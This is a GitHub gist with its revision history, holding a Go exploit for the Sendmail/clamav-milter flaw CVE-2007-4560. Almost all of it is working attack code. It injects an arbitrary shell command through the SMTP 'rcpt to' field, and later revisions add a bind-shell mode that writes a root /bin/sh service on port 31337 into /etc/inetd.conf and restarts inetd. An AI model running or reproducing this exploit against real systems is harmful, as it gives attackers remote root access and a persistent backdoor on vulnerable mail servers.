Last active
March 10, 2021 20:09
-
-
Save 0xjbb/fdf1678addf0c957bf2b284b29e4dff4 to your computer and use it in GitHub Desktop.
Revisions
-
0xjbb revised this gist
Mar 10, 2021 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -33,6 +33,7 @@ func main(){ conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n")) } conn.Write([]byte("data\r\n.\r\nquit\r\n")) } -
Mar 10, 2021 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -25,6 +25,7 @@ func main(){ conn.Write([]byte("helo you\r\n")) conn.Write([]byte("mail from: <>\r\n")) if *bind { conn.Write([]byte("rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n")) conn.Write([]byte("rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n")) -
Mar 10, 2021 . 1 changed file with 10 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,7 +2,7 @@ package main // Sendmail w/ clamav-milter Remote Root Exploit // 'CVE-2007-4560' // coded by https://github.com/0xjbb :) // go run exploit.go -h 192.168.109.42 -p 25 -c "ping -c 5 192.168.49.109" import ( "flag" "log" @@ -12,7 +12,8 @@ import ( func main(){ ip := flag.String("h", "", "Ip Address") port := flag.String("p", "25", "Port") bind := flag.Bool("b", false, "Spawn bind shell on target") cmd := flag.String("c", "", "Use Command instead of bind shell") flag.Parse() @@ -24,7 +25,13 @@ func main(){ conn.Write([]byte("helo you\r\n")) conn.Write([]byte("mail from: <>\r\n")) if *bind { conn.Write([]byte("rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n")) conn.Write([]byte("rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n")) }else{ conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n")) } conn.Write([]byte("data\r\n.\r\nquit\r\n")) } -
Mar 10, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,30 @@ package main // Sendmail w/ clamav-milter Remote Root Exploit // 'CVE-2007-4560' // coded by https://github.com/0xjbb :) // go run CVE-2007-4560.go -h <target ip> -p 25 -c "ping -c 5 <your ip>" import ( "flag" "log" "net" ) func main(){ ip := flag.String("h", "", "Ip Address") port := flag.String("p", "25", "Port") cmd := flag.String("c", "", "Command") flag.Parse() conn, err := net.Dial("tcp", *ip + ":" + *port) if err != nil{ log.Fatal("Connection error: ", err) } conn.Write([]byte("helo you\r\n")) conn.Write([]byte("mail from: <>\r\n")) conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n")) conn.Write([]byte("data\r\n.\r\nquit\r\n")) }